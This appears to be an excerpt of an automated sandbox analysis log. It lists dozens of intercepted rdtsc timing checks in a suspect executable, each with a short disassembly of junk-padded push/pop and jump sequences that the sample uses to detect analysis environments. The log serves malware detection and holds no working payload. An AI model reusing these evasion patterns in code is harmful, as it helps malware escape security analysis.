            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A29712 second address: A29716 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A31B41 second address: A31B63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007FA6C4CAD506h 0x0000000e jmp 00007FA6C4CAD514h 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A31B63 second address: A31B6D instructions: 0x00000000 rdtsc 0x00000002 jc 00007FA6C4EBA076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A31B6D second address: A31B74 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A31DF3 second address: A31E01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA6C4EBA07Ah 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A31E01 second address: A31E05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A31E05 second address: A31E13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007FA6C4EBA076h 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A31E13 second address: A31E25 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A31F87 second address: A31FA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007FA6C4EBA086h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A31FA2 second address: A31FA7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A31FA7 second address: A31FC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA6C4EBA086h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A32128 second address: A32135 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FA6C4CAD506h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A32278 second address: A32294 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA6C4EBA088h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A32294 second address: A322A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 ja 00007FA6C4CAD506h 0x0000000d pop edx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A322A2 second address: A322AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FA6C4EBA076h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A322AC second address: A322B7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A3A47F second address: A3A498 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jns 00007FA6C4EBA076h 0x0000000c popad 0x0000000d jnp 00007FA6C4EBA07Ch 0x00000013 jc 00007FA6C4EBA076h 0x00000019 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A388BC second address: A388CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FA6C4CAD506h 0x0000000a jc 00007FA6C4CAD506h 0x00000010 popad 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A38B5B second address: A38B6A instructions: 0x00000000 rdtsc 0x00000002 jng 00007FA6C4EBA07Ah 0x00000008 pushad 0x00000009 popad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A38CFA second address: A38D12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA6C4CAD514h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A39279 second address: A3927D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A3927D second address: A3928D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4CAD50Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A3928D second address: A39299 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FA6C4EBA076h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A39299 second address: A3929D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A3A348 second address: A3A34C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A3A34C second address: A3A357 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A382A7 second address: A382BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push esi 0x0000000a pop esi 0x0000000b pushad 0x0000000c popad 0x0000000d jng 00007FA6C4EBA076h 0x00000013 popad 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A382BB second address: A382C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A41B64 second address: A41B69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A41B69 second address: A41B6E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A4158D second address: A41599 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FA6C4EBA076h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A4171E second address: A4172E instructions: 0x00000000 rdtsc 0x00000002 jno 00007FA6C4CAD506h 0x00000008 js 00007FA6C4CAD506h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A4E5E1 second address: A4E5E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A4E5E7 second address: A4E5ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A4E5ED second address: A4E60A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4EBA07Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e jno 00007FA6C4EBA076h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A4E60A second address: A4E60F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A51132 second address: A51142 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jng 00007FA6C4EBA07Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A51142 second address: A51155 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FA6C4CAD50Bh 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A50CB0 second address: A50CC3 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FA6C4EBA076h 0x00000008 jbe 00007FA6C4EBA076h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A5386D second address: A53877 instructions: 0x00000000 rdtsc 0x00000002 js 00007FA6C4CAD506h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A53877 second address: A53882 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A539DA second address: A539DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A539DF second address: A539E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A539E4 second address: A539EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A5C0FC second address: A5C125 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FA6C4EBA076h 0x0000000a popad 0x0000000b pushad 0x0000000c jbe 00007FA6C4EBA076h 0x00000012 jmp 00007FA6C4EBA084h 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A5D741 second address: A5D747 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A5D747 second address: A5D74B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A64B11 second address: A64B1D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A64B1D second address: A64B3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push edi 0x0000000a jmp 00007FA6C4EBA07Fh 0x0000000f js 00007FA6C4EBA076h 0x00000015 pop edi 0x00000016 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A64B3D second address: A64B59 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4CAD50Fh 0x00000007 pushad 0x00000008 ja 00007FA6C4CAD506h 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A64941 second address: A64947 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A64947 second address: A64951 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FA6C4CAD506h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A6D952 second address: A6D956 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A6C5CC second address: A6C5D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A6C9DC second address: A6C9E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A6C9E8 second address: A6C9EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A6D621 second address: A6D63A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jmp 00007FA6C4EBA07Eh 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A72504 second address: A72516 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jo 00007FA6C4CAD50Eh 0x0000000e push edi 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A72516 second address: A7251A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A7251A second address: A72546 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FA6C4CAD519h 0x00000008 pop esi 0x00000009 pushad 0x0000000a jbe 00007FA6C4CAD506h 0x00000010 jg 00007FA6C4CAD506h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A74143 second address: A74147 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A74147 second address: A74151 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A7E3E5 second address: A7E3EB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A7E254 second address: A7E25E instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FA6C4CAD506h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A7E25E second address: A7E264 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A7E264 second address: A7E27C instructions: 0x00000000 rdtsc 0x00000002 jng 00007FA6C4CAD508h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c je 00007FA6C4CAD506h 0x00000012 jg 00007FA6C4CAD506h 0x00000018 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A83584 second address: A8358A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A7CB42 second address: A7CB5E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4CAD518h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A904AD second address: A904C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4EBA07Eh 0x00000007 jng 00007FA6C4EBA076h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A8FFF1 second address: A8FFFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FA6C4CAD506h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A90196 second address: A901CE instructions: 0x00000000 rdtsc 0x00000002 je 00007FA6C4EBA076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FA6C4EBA089h 0x0000000f jmp 00007FA6C4EBA082h 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: A901CE second address: A901D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: AA5438 second address: AA5454 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FA6C4EBA086h 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: AA55AE second address: AA55FA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jc 00007FA6C4CAD506h 0x00000009 push eax 0x0000000a pop eax 0x0000000b pop ebx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jne 00007FA6C4CAD506h 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 je 00007FA6C4CAD542h 0x0000001e js 00007FA6C4CAD51Bh 0x00000024 push ecx 0x00000025 pop ecx 0x00000026 jmp 00007FA6C4CAD513h 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007FA6C4CAD511h 0x00000032 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: AA5E2A second address: AA5E30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: AA5E30 second address: AA5E4F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jns 00007FA6C4CAD506h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007FA6C4CAD50Eh 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: AA613B second address: AA6140 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: AA6140 second address: AA615F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FA6C4CAD506h 0x0000000a pop esi 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 jnp 00007FA6C4CAD506h 0x00000016 pop edi 0x00000017 push eax 0x00000018 push edx 0x00000019 js 00007FA6C4CAD506h 0x0000001f rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: AA615F second address: AA6165 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: AAA67E second address: AAA682 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 5050534 second address: 505056A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4EBA085h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FA6C4EBA088h 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 505056A second address: 5050579 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4CAD50Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 5050579 second address: 5050591 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA6C4EBA084h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 50706F6 second address: 50706FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 50706FC second address: 507070D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA6C4EBA07Dh 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 507070D second address: 5070711 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 5070711 second address: 5070751 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FA6C4EBA07Ch 0x0000000e xchg eax, ecx 0x0000000f jmp 00007FA6C4EBA080h 0x00000014 xchg eax, esi 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FA6C4EBA087h 0x0000001c rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 5070751 second address: 50707AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4CAD519h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c mov dx, AD00h 0x00000010 jmp 00007FA6C4CAD519h 0x00000015 popad 0x00000016 mov edx, ecx 0x00000018 popad 0x00000019 xchg eax, esi 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FA6C4CAD519h 0x00000021 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 507084A second address: 5070850 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 5070850 second address: 5070856 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 5070856 second address: 507085A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 507085A second address: 507087C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FA6C4CAD514h 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 507087C second address: 5070880 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 5070880 second address: 5070886 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 5070886 second address: 507088C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
